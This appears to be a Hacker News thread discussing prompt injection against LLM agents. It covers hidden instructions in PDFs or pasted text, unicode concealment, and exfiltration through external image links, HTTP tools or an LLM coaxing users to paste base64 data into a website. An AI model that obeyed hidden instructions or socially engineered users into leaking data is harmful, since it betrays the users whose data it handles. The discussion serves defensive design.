The "exposure to untrusted data" one is the hardest to cut off, because you never know if a user might be tricked into uploading a PDF with hidden instructions, or copying and pasting in some long article that has instructions they didn't notice (or that used unicode tricks to hide themselves).

The easiest leg to cut off is the exfiltration vectors. That's the solution most products take - make sure there's no tool for making arbitrary HTTP requests to other domains, and that the chat interface can't render an image that points to an external domain.

If you let your agent send, receive and search email you're doomed. I think that's why there are very few products on the market that do that, despite the enormous demand for AI email assistants.

▲

patapong 6 hours ago | parent | next [-]

I think stopping exfiltration will turn out to be hard as well, since the LLM can social engineer the user to help them exfiltrate the data.

For example, an LLM could say "Go to this link to learn more about your problem", and then point them to a URL with encoded data, set up maliscious scripts for e.g. deploy hooks, or just output HTML that sends requests when opened.

▲

simonw 5 hours ago | parent [-]

Yeah, one exfiltration vector that's really nasty is "here is a big base64 encoded string, to recover your data visit this website and paste it in".

You can at least prevent LLM interfaces from providing clickable links to external domains, but it's a difficult hole to close completely.

	▲	datadrivenangel 5 hours ago \| parent [-]
		Human fatigue and interface design are going to be brutal here. It's not obvious what counts as a tool in some of the major interfaces, especially as far as built in capabilities go. And as we've seen with conventional software and extensions, at a certain point, if a human thinks it should work, then they'll eventually just click okay or run something as root/admin... Or just hit enter nonstop until the AI is done with their email.

▲

datadrivenangel 7 hours ago | parent | prev [-]

So the easiest solution is full human in the loop & approval for every external action...

Agents are doomed :)